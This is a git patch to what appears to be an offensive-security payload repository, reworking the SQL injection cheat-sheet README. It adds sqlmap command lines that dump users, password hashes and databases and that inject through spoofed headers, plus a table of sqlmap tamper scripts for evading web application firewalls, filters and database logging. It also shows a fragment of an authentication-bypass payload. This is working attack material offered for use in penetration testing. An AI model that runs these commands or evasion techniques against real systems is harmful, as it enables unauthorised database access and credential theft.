From d6eaa26820cf672527ba0fbf3966431f8ba13d00 Mon Sep 17 00:00:00 2001
From: swisskyrepo
Date: Sun, 4 Dec 2016 19:18:49 +0700
Subject: [PATCH] SQL injection - Tamper script
---
 SQL injection/README.md | 73 ++++++++++++++++++++++++++++++++++++++---
 1 file changed, 68 insertions(+), 5 deletions(-)
diff --git a/SQL injection/README.md b/SQL injection/README.md
index aa79a76..11bae55 100644
--- a/SQL injection/README.md
+++ b/SQL injection/README.md
@@ -1,10 +1,6 @@
 # SQL injection
 A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
-## SQL injection using SQLmap
-```
-sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
-```
 ## Entry point detection
 Detection of an SQL injection entry point
@@ -26,6 +22,72 @@ Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was transformed into U+0027 APOSTROPHE (')
 ```
+
+
+## SQL injection using SQLmap
+Basic arguments for SQLmap
+```
+sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
+```
+
+Custom injection in UserAgent/Header/Referer/Cookie
+```
+python sqlmap.py -u "http://example.com" --data "username=admin&password=pass" --headers="x-forwarded-for:127.0.0.1*"
+```
+
+General tamper option and tamper's list
+```
+tamper=name_of_the_tamper
+```
+
+| Tamper | Description |
+| --- | --- |
+|apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart |
+|apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart|
+|appendnullbyte.py | Appends encoded NULL byte character at the end of payload |
+|base64encode.py | Base64 all characters in a given payload |
+|between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' |
+|bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator |
+|chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) |
+|commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'|
+|commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'|
+|concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'|
+|charencode.py | Url-encodes all characters in a given payload (not processing already encoded) |
+|charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) |
+|equaltolike.py | Replaces all occurances of operator equal ('=') with operator 'LIKE' |
+|escapequotes.py | Slash escape quotes (' and ") |
+|greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart |
+|halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword |
+|ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'|
+|modsecurityversioned.py | Embraces complete query with versioned comment |
+|modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment |
+|multiplespaces.py | Adds multiple spaces around SQL keywords |
+|nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters|
+|percentage.py | Adds a percentage sign ('%') infront of each character |
+|overlongutf8.py | Converts all characters in a given payload (not processing already encoded) |
+|randomcase.py | Replaces each keyword character with random case value |
+|randomcomments.py | Add random comments to SQL keywords|
+|securesphere.py | Appends special crafted string|
+|sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs |
+|space2comment.py | Replaces space character (' ') with comments |
+|space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') |
+|space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
+|space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
+|space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
+|space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') |
+|space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
+|space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') |
+|space2plus.py | Replaces space character (' ') with plus ('+') |
+|space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
+|symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) |
+|unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT |
+|unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) |
+|uppercase.py | Replaces each keyword character with upper case value 'INSERT'|
+|varnish.py | Append a HTTP header 'X-originating-IP' |
+|versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment |
+|versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
+|xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'|
+
 ## Authentication bypass
 ```
 '-'
@@ -165,4 +227,5 @@ WHERE -> HAVING
 - [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet)
 - [Pentestmonkey's Informix SQL Injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet)
 - [SQLite3 Injection Cheat sheet] (https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
- - [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/)
\ No newline at end of file
+ - [Ruby on Rails (Active Record) SQL Injection Guide] (http://rails-sqli.org/)
+ - [ForkBombers SQLMap Tamper Scripts Update](http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html)
\ No newline at end of file